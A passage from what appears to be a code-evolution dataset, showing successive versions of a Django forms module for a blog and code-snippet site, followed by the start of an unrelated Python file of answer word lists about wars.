self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n 
self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n 
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n 
self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-3": "<mask token>\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetData\n fields = ['snippet_topics', 'snippet_data_subject',\n 'snippet_data_description', 'snippet_data_keyword',\n 'snippet_data_code', 'snippet_data_datetime',\n 'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'\n ] = 'Title/Topics'\n self.fields['snippet_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['snippet_data_code'].widget.attrs['placeholder'\n ] = 'Snippet (Code)'\n self.fields['snippet_data_publish'].widget.attrs['placeholder'\n ] = 'Ready-To-Publish'\n self.fields['snippet_data_publish'].label = 'Publish'\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n 
self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, 
self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n 
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-4": "<mask token>\n\n\nclass SignupForm(UserCreationForm):\n <mask token>\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password1', 'password2'\n <mask token>\n\n\nclass UserRegistrationForm(forms.Form):\n username = forms.CharField(required=True, min_length=6, label=\n 'Username', max_length=100, widget=forms.TextInput(attrs={\n 'placeholder': 'Username'}))\n email = forms.EmailField(required=True, label='Email', max_length=100,\n widget=forms.EmailInput(attrs={'placeholder':\n 'e.g. : email@gmail.com'}))\n firstname = forms.CharField(required=True, label='First Name',\n max_length=100, widget=forms.TextInput(attrs={'placeholder':\n 'First Name'}))\n lastname = forms.CharField(required=True, label='Last Name', max_length\n =100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))\n password = forms.CharField(required=True, label='Password', max_length=\n 100, widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))\n passwordagain = forms.CharField(required=True, label='Password (Again)',\n max_length=100, widget=forms.PasswordInput(attrs={'placeholder':\n 'Password (Again)'}))\n\n\nclass TblPublishForm(forms.ModelForm):\n\n\n class Meta:\n model = TblPublish\n fields = '__all__'\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetData\n fields = ['snippet_topics', 'snippet_data_subject',\n 'snippet_data_description', 'snippet_data_keyword',\n 'snippet_data_code', 'snippet_data_datetime',\n 'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n 
self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'\n ] = 'Title/Topics'\n self.fields['snippet_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['snippet_data_code'].widget.attrs['placeholder'\n ] = 'Snippet (Code)'\n self.fields['snippet_data_publish'].widget.attrs['placeholder'\n ] = 'Ready-To-Publish'\n self.fields['snippet_data_publish'].label = 'Publish'\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def 
__init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n 
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n 
return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-5": "from django import forms\nfrom django.contrib.auth.models import User\nfrom .models import TblPublish , TblSnippetTopics, TblSnippetData, TblLearnTopics, TblLearnData, TblBlog, TblBlogComments,TblLearnDataComments, TblBlogGvp, TblLearnDataGvp,TblSnippetDataGvp, TblHome, TblAbout, TblQueries\nfrom django.contrib.auth.forms import UserCreationForm\n\nclass UsersigninForm(forms.Form):\n username = forms.CharField(required = True, label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}))\n password = forms.CharField(required = True, label = 'Password', max_length = 32, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))\n\nclass SignupForm(UserCreationForm):\n email = forms.EmailField(max_length=200, help_text='Required')\n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\n def __init__(self, *args, **kwargs):\n super(SignupForm, self).__init__(*args, **kwargs)\n self.fields['username'].widget.attrs['placeholder'] = \"Username\"\n self.fields['email'].widget.attrs['placeholder'] = \"email\"\n self.fields['password1'].widget.attrs['placeholder'] =\"password\"\n self.fields['password2'].widget.attrs['placeholder'] = \"password Again\"\n\nclass UserRegistrationForm(forms.Form):\n username = forms.CharField(required = True, min_length=6,label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}) )\n email = forms.EmailField(required = True, label = 'Email', max_length = 100, widget=forms.EmailInput(attrs={'placeholder': 'e.g. 
: email@gmail.com'}))\n firstname = forms.CharField(required = True, label = 'First Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'First Name'}))\n lastname = forms.CharField(required = True, label = 'Last Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))\n password = forms.CharField(required = True, label = 'Password', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))\n passwordagain = forms.CharField(required = True, label = 'Password (Again)', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password (Again)'}))\n\nclass TblPublishForm(forms.ModelForm):\n class Meta():\n model = TblPublish\n fields = '__all__'\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n class Meta():\n model = TblSnippetData\n fields = ['snippet_topics','snippet_data_subject','snippet_data_description','snippet_data_keyword','snippet_data_code','snippet_data_datetime','snippet_data_added_by','snippet_topics','snippet_data_publish']\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['snippet_data_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'] =\"Keyword For Search\"\n self.fields['snippet_data_code'].widget.attrs['placeholder'] = \"Snippet (Code)\"\n self.fields['snippet_data_publish'].widget.attrs['placeholder'] = \"Ready-To-Publish\"\n self.fields['snippet_data_publish'].label = 
\"Publish\"\n\nclass TblBlogForm(forms.ModelForm):\n class Meta():\n model = TblBlog\n fields = ['blog_title','blog_description','blog_keyword','blog_content','blog_pics','blog_publish','blog_datetime','blog_summary','blog_like','blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['blog_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['blog_content'].widget.attrs['placeholder'] = \"Blog Content\"\n self.fields['blog_keyword'].widget.attrs['placeholder'] = \"Keyword For Search\"\n self.fields['blog_pics'].widget.attrs['placeholder'] = \"Upload Pics\"\n self.fields['blog_publish'].label = \"Publish\"\n\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n class Meta():\n model = TblBlogComments\n fields = '__all__'\n\nclass TblLearnDataForm(forms.ModelForm):\n class Meta():\n model = TblLearnData\n fields = ['learn_data','learn_data_keyword','learn_data_description','learn_data_publish','learn_data_datetime','learn_data_added_by','learn_topics','learn_data_like','learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['learn_data_description'].widget.attrs['placeholder'] = \"Brief Description\"\n 
self.fields['learn_data_keyword'].widget.attrs['placeholder'] = \"Keyword For Search\"\n self.fields['learn_data_publish'].label = \"Publish\"\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n class Meta():\n model = TblLearnDataComments\n fields = '__all__'\n\nclass TblBlogGvpForm(forms.ModelForm):\n class Meta():\n model = TblBlogGvp\n fields = '__all__'\nclass TblLearnDataGvpForm(forms.ModelForm):\n class Meta():\n model = TblLearnDataGvp\n fields = '__all__'\nclass TblHomeForm(forms.ModelForm):\n class Meta():\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = \"Upload Image\"\n self.fields['home_content'].widget.attrs['placeholder'] = \"Content\"\n self.fields['home_content_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['home_publish'].label = \"Publish\"\n\n\nclass TblAboutForm(forms.ModelForm):\n class Meta():\n model = TblAbout\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = \"Upload Image\"\n self.fields['about_content'].widget.attrs['placeholder'] = \"Content\"\n self.fields['about_content_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['about_publish'].label = \"Publish\"\n\nclass TblLearnTopicsForm(forms.ModelForm):\n class Meta():\n model = TblLearnTopics\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n # self.fields['learn_topics_added_by'].widget = 
forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = \"Topics\"\n self.fields['learn_topics_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['learn_topics_publish'].label = \"Publish\"\n\n\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n class Meta():\n model = TblSnippetTopics\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = \"Topics\"\n self.fields['snippet_topics_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['snippet_topics_publish'].label = \"Publish\"\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\nclass TblQueriesForm(forms.ModelForm):\n class Meta():\n model = TblQueries\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = \"Name\"\n self.fields['email'].widget.attrs['placeholder'] = \"Email\"\n self.fields['subject'].widget.attrs['placeholder'] = \"Subject\"\n self.fields['message'].widget.attrs['placeholder'] 
= \"Message\"\n",
"step-ids": [
19,
20,
22,
26,
32
]
}
|
[
19,
20,
22,
26,
32
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
Ylist = ['yes', 'Yes', 'Y', 'y']
Nlist = ['no', 'No', 'N', 'n']
America = ['America', 'america', 'amer', 'rica']
TRW = ['1775', 'The Revolutionary war', 'the Revolutionary war',
'the revolutionary war', 'The Revolutionary War', 'trw', 'Trw', 'TRW']
TCW = ['1861', 'The civil war', 'The civil War', 'The Civil war',
'The Civil war', 'The civil War', 'The Civil War', 'TCW', 'tcw', 'Tcw']
TGW = ['1917', 'The Great War', 'the great war', 'the great War',
'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1', 'wW1',
'World War One', 'World war 1']
WW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two',
'World War 2', 'World War Two', 'world war two', 'world war two']
Russia = ['Russia', 'russia', 'rusia', 'ra', 'Ra', 'Rusia', 'Ru']
RJW = ['1904', 'TRJW', 'trjw']
<|reserved_special_token_1|>
Ylist = ['yes', 'Yes', 'Y', 'y']
Nlist = ['no', 'No', 'N', 'n']
America = ['America', 'america', 'amer', 'rica']
TRW = ['1775', 'The Revolutionary war', 'the Revolutionary war', 'the revolutionary war', 'The Revolutionary War',
'trw', 'Trw', 'TRW']
TCW = ['1861', 'The civil war', 'The civil War', 'The Civil war', 'The Civil war', 'The civil War', 'The Civil War',
'TCW', 'tcw', 'Tcw']
TGW = ['1917', 'The Great War', 'the great war', 'the great War', 'the Great war', 'The great war', 'WW1', 'ww1', 'Ww1',
'wW1', 'World War One', 'World war 1']
WW2 = ['1941', 'WW2', 'ww2', 'Ww2', 'W2', 'World war two', 'World war two', 'World War 2', 'World War Two',
